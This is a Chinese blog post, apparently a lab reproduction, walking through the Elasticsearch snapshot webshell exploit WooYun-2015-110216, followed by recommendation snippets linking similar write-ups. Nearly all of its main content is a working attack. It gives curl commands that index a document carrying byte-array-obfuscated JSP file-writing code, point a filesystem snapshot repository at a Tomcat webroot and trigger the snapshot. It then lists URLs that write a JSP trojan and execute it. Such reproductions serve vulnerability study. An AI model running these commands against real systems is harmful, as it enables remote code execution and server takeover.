WooYun-2015-110216漏洞-ElastticSearch

已于 2024-09-04 15:25:04 修改
阅读量170 收藏 5
点赞数 1
文章标签: java 前端 服务器
于 2024-09-04 15:13:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chinese_cabbage0/article/details/141894626
版权

1.创建索引文档

curl -XPOST http://192.168.0.131:9200/yz.jsp/yz.jsp/1 -d'
{"<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47,116,101,115,116,46,106,115,112})),new String(new byte[]{114,119})).write(request.getParameter(new String(new byte[]{102})).getBytes());%>":"test"}'

2.再创建一个恶意的存储库,其中location的值即为我要写入的路径

curl -XPUT 'http://192.168.0.131:9200/_snapshot/yz.jsp' -d '{
     "type": "fs",
     "settings": {
          "location": "/usr/local/tomcat/webapps/wwwroot/",
          "compress": false
     }
}'

3.存储库验证并创建:

curl -XPUT "http://192.168.0.131:9200/_snapshot/yz.jsp/yz.jsp" -d '{
     "indices": "yz.jsp",
     "ignore_unavailable": "true",
     "include_global_state": false
}'

4.下面的url中的f=的参数就是写入文档中的内容,可以写入jsp木马-注意是8080端口

http://192.168.0.131:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp?f=wooYun-2015-110216

5.写入木马后访问-注意是8080端口

http://192.168.0.131:8080/wwwroot/test.jsp  //就可以执行里面的内容

xing.yu.CTF
关注
WooYun-2016-199433 phpmyadmin反序列化漏洞复现
凝聚力安全团队
01-25 1130
目录漏洞描述影响版本漏洞环境搭建漏洞分析漏洞检测漏洞利用漏洞加固 漏洞描述    影响版本 phpMyAdmin 2.x版本 漏洞环境搭建 漏洞分析 漏洞检测 漏洞利用 漏洞加固
WooYun-2015-110216 ElasticSearch写入webshell漏洞
weixin_51387754的博客
11-19 1878
漏洞原理 ElasticSearch具有备份数据的功能,用户可以传入一个路径,让其将数据备份到该路径下,且文件名和后缀都可控。 所以,如果同文件系统下还跑着其他服务,如Tomcat、PHP等,我们可以利用ElasticSearch的备份功能写入一个webshell。 和CVE-2015-5531类似,该漏洞和备份仓库有关。在elasticsearch1.5.1以后,其将备份仓库的根路径限制在配置文件的配置项path.repo中,而且如果管理员不配置该选项,则默认不能使用该功能。即使管理员配置了该选项,web
Elasticsearch写入webshell漏洞 WooYun-2015-110216 漏洞复现
ADummy的博客
02-24 433
Elasticsearch写入webshell漏洞WooYun-2015-110216) by ADummy 0x00利用路线 ​ 创建一个恶意索引文档—>创建一个恶意的存储库—>存储库验证并创建—>写入webshell 0x01漏洞介绍 ​ ElasticSearch具有备份数据的功能,用户可以传入一个路径,让其将数据备份到该路径下,且文件名和后缀都可控。 所以,如果同文件系统下还跑着其他服务,如Tomcat、PHP等,我们可以利用ElasticSearch的备份功能写入一个w
Elasticsearch写入webshell漏洞WooYun-2015-110216
黑白的博客
12-13 1232
声明 好好学习,天天向上 漏洞描述 ElasticSearch具有备份数据的功能,用户可以传入一个路径,让其将数据备份到该路径下,且文件名和后缀都可控。 所以,如果同文件系统下还跑着其他服务,如Tomcat、PHP等,我们可以利用ElasticSearch的备份功能写入一个webshell。 和CVE-2015-5531类似,该漏洞和备份仓库有关。在elasticsearch1.5.1以后,其将备份仓库的根路径限制在配置文件的配置项path.repo中,而且如果管理员不配置该选项,则默认不能使用该功能。即使
Elasticsearch写入webshell漏洞WooYun-2015-110216)
weixin_45366453的博客
07-02 404
Elasticsearch写入webshell漏洞WooYun-2015-110216
利用Vulnhub复现漏洞 - Elasticsearch写入webshell漏洞WooYun-2015-110216
JiangBuLiu的博客
07-03 1852
Elasticsearch写入webshell漏洞WooYun-2015-110216)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现创建一个恶意索引文档创建一个恶意的存储库存储库验证并创建检验 Vulnhub官方复现教程 https://vulhub.org/#/environments/elasticsearch/WooYun-2015-110216/ 漏洞原理 ElasticS...
wooyun_2015_110216-Elasticsearch-vulfocus
c0529的博客
06-10 527
ElasticSearch具有备份数据的功能,用户可以传入一个路径,让其将数据备份到该路径下,且文件名和后缀都可控。所以,如果同文件系统下还跑着其他服务,如Tomcat、PHP等,我们可以利用ElasticSearch的备份功能写入一个webshell。和CVE-2015-5531类似,该漏洞和备份仓库有关。在elasticsearch1.5.1以后,其将备份仓库的根路径限制在配置文件的配置项path.repo中,而且如果管理员不配置该选项,则默认不能使用该功能。
WooYun-2016-199433 phpmyadmin 反序列化漏洞
xuxuxuxxxxx的博客
05-31 183
phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。
discuz wooyun-2010-080723
weixin_37639863的博客
02-17 1905
漏洞复现-Discuz-命令执行(wooyun-2010-080723) - 铺哩 - 博客园0x00 实验环境 攻击机:win10 靶机:Ubuntu18 (docker搭建的vulhub靶场) 0x01 影响版本 Discuz 7.x 6.x版本 0x02 实验目的 学习discuz的部分https://www.cnblogs.com/cute-puli/p/13333991.htmlbuuctf [Discuz]wooyun-2010-080723_Fatesec的博客-CSDN博客漏洞描述由于php
py爬虫wooyun-public-master
04-20
### py爬虫wooyun-public-master #### 知识点一:Py爬虫与Wooyun_public-master的关系 - **Py爬虫**:通常指的是使用Python语言编写的网络爬虫程序。这类程序能够自动地抓取互联网上的数据,并进行处理和分析。 - ...
正方教务系统php登陆,正方教务管理系统最新版无条件注入&GetShell | wooyun-2015-0122523| WooYun.org...
weixin_35983438的博客
03-21 1776
正方教务系统提供了一系列的WebService接口,然而这些接口并未经过严格的认证,从而导致任何浏览者都可以使用这些接口查询信息。由于其对用户提交的参数未进行过滤,从而导致注入的发生!搜索发现正方教务系统的asmx文件大致有这么些:【1】文件管理接口首先查看file.asmx:checkFile(检查文件是否存在)只要求提供一个文件路径便可以工作。尝试使用soap协议去请求:UpFile2Dir(...
C语言 | 第十章 | 函数 作用域
ZJC744575的博客
10-05 1254
为完成某一功能的程序指令(语句)的集合,称为函数。在C语言中,函数分为:自定义函数、系统函数(查看C语言函数手册)函数还有其它叫法,比如方法等,在本视频课程中,我们统一称为 函数。返回类型 函数名(形参列表){执行语句...;// 函数体return 返回值;// 可选形参列表:表示函数的输入函数中的语句:表示为了实现某一功能代码块函数可以有返回值,也可以没有, 如果没有返回值,返回类型 声明为 void。
JAVA开源】基于Vue和SpringBoot的高校学科竞赛平台
杨荧的CSDN博客
10-10 938
教师功能有个人中心,题目类型管理,竞赛题库管理,竞赛类型管理,竞赛信息管理,报名信息管理,竞赛评分管理,参赛名单管理,晋级名单管理,获奖名单管理,竞赛总结管理,报销清单管理,成绩申诉管理,参赛信息管理,参赛信息管理,往年成绩管理,获奖情况管理。
JDK1.0主要特性
FoolRabbit的专栏
10-06 368
JDK1.0主要特性。
初学java练习题【1】
最新发布
lxt135744的博客
10-10 71
【代码】初学java练习题【1】
Netty 相比原生IO模型的优势
lssffy的博客
10-09 382
Java提供了多种I/O模型,每种模型都有其适用的场景和特点,随着网络应用需求的变化,I/O模型也在不断发展。阻塞I/O(BIO,Blocking I/O)传统的I/O模型,使用简单,但每次I/O操作都会阻塞线程。每个请求需要独立的线程来处理,这在并发请求较少时问题不大,但在高并发情况下,线程资源将成为瓶颈。非阻塞I/O(NIO,Non-Blocking I/O)引入了多路复用技术,一个线程可以处理多个连接,避免了BIO中每个连接占用一个线程的问题。通过Selector。
JAVA开源项目 旅游管理系统 计算机毕业设计
as230627的博客
10-03 1414
旅游管理系统基于Springboot框架、JAVA编程语言、MYSQL数据库开发完成,“操作简单,功能实用”这是本软件设计的核心理念,本系统力求创造最好的用户体验。
wooyun-2010-09336
01-14
wooyun-2010-09336是2010年发生的一起网络安全漏洞事件。这个漏洞是由于某个网站的后台管理系统存在缺陷,使得攻击者可以绕过身份验证,远程执行恶意代码,从而获取系统的控制权。 当时,一位白帽黑客通过对该网站...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值